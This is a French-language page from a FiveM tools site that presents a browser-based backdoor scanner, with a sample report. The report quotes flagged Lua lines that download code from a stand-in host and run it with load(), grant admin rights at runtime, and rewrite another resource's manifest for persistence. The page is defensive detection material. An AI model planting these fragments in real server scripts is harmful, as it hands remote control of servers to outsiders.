devtoolsgg.com
Guides
GuidesFiveMFiveMGarry's ModMinecraftShared
FiveMFiveM

Serveur & infrastructure

  • server.cfg
  • fxmanifest
  • Permissions ACE
  • Scaffolder

Frameworks

  • Jobs
  • Items

Gameplay

  • Blips
  • Markers
  • Texte 3D
  • DiscordLogs Discord

Sécurité

  • Scanner de backdoors

Listes de référence

  • Sprites de blips
  • Markers
  • Checkpoints
  • Couleurs HUD
  • Contrôles
  • Formatage de texte
  • Véhicules
  • Modèles de peds
  • Armes
  • Couleurs de véhicules
  • Stations de radio
devtoolsgg.com

Générateurs pour propriétaires de serveurs de jeu

Plateformes

  • FiveM
  • Garry's Mod
  • Minecraft
  • Shared

Ressources

  • Accueil
  • llms.txt

Réseaux

  • Bientôt disponible.

© 2026 devtoolsgg.com

Sans aucune affiliation avec Cfx.re, Rockstar Games, Facepunch Studios, Mojang, Microsoft ou Valve. Toutes les marques appartiennent à leurs propriétaires respectifs.

  1. FiveM
  2. Sécurité
  3. Scanner de backdoors

Scanner de backdoors

Déposez une ressource, un .zip ou un simple fichier et obtenez toutes les formes de backdoor connues signalées : code téléchargé puis exécuté, chaînes masquées, attribution de permissions à la volée et fuite de secrets. Tout tourne dans votre navigateur.

Déposez un dossier de ressource, un .zip ou un fichier .lua

Tout est lu dans votre navigateur. Aucun fichier n'est envoyé, vous pouvez donc l'utiliser sur un script payant en qui vous n'avez pas confiance.

Un .zip est décompressé dans le navigateur. Seuls les fichiers texte sont lus, jusqu'à 400.

optionnel

Indique au scanner quel jeu de règles appliquer à l'extrait collé.

optionnel

Pratique pour un handler isolé qui vous inquiète. Analysé avec les fichiers déposés.

Rien n'est envoyé. Les fichiers sont lus et analysés localement, puis oubliés quand vous quittez la page.
1Generated with devtoolsgg.com2-- RÉSUMÉ --------------------------------------------------------------3Fichiers : 1   Lignes : 134[X] 4 critique   [!] 2 élevé   [-] 0 moyen   [.] 0 faible56-- CRITIQUE (4) --------------------------------------------------------78[X] Télécharge du code et l'exécute9    pasted.lua:210    > PerformHttpRequest("https://example-cdn.tld/p.lua", function(code, body)1112    Une requête HTTP se trouve à quelques lignes d'un appel à load().13    Cette paire est un shell distant : qui contrôle l'URL contrôle votre14    serveur. Les scanners publiés la traitent comme un signal définitif.1516[X] assert(load(...)) exécute une chaîne comme du code17    pasted.lua:418    > assert(load(body))()1920    La forme de backdoor FiveM la plus répandue. Toute chaîne qui21    atteint load() s'exécute avec les privilèges du serveur. Remontez à22    la source de cette chaîne : si elle est téléchargée, décodée ou23    construite à l'exécution, considérez la ressource comme compromise.2425[X] Attribue des permissions à l'exécution26    pasted.lua:1027    > ExecuteCommand(("add_principal identifier.%s group.admin"):format(identifier))2829    La ressource donne les droits admin à un identifiant pendant que le30    serveur tourne, donc cela n'apparaît jamais dans votre31    permissions.cfg. Regardez quel identifiant est visé. Si ce n'est pas32    le vôtre, c'est une backdoor.3334[X] Réécrit un fxmanifest35    pasted.lua:1336    > SaveResourceFile("chat", "fxmanifest.lua", "client_script 'x.lua'", -1)3738    Modifier un manifest à l'exécution ajoute un script à une ressource39    sans toucher aux fichiers de ce script. Il n'y a aucune raison40    légitime de faire ça.4142-- ÉLEVÉ (2) -----------------------------------------------------------4344[!] Requête HTTP sortante45    pasted.lua:246    > PerformHttpRequest("https://example-cdn.tld/p.lua", function(code, body)4748    Vérifiez la destination. Une vérification de licence vers le domaine49    de l'auteur est normale ; une requête vers un domaine que vous ne50    reconnaissez pas, surtout si elle transporte des identifiants ou de51    la config, ne l'est pas.5253[!] Écrit un fichier de ressource à l'exécution54    pasted.lua:1355    > SaveResourceFile("chat", "fxmanifest.lua", "client_script 'x.lua'", -1)5657    C'est ainsi qu'une backdoor survit à un redémarrage : elle se58    réécrit, ou réécrit une autre ressource ou un fxmanifest, après59    avoir été nettoyée. Comportement documenté des familles Blum Panel60    et Cipher. Regardez quelle ressource et quel fichier sont écrits.6162-- ALERTES PAR FICHIER -------------------------------------------------63   6  pasted.lua6465-- NOTE ----------------------------------------------------------------66Heuristiques statiques, pas une preuve : cela signale des formes67habituellement fautives et reste muet sur la logique qu'il ne voit pas.68Lisez les lignes signalées, puis comparez la ressource à la version69officielle de son auteur.70
report70 lignes, 2925 caractères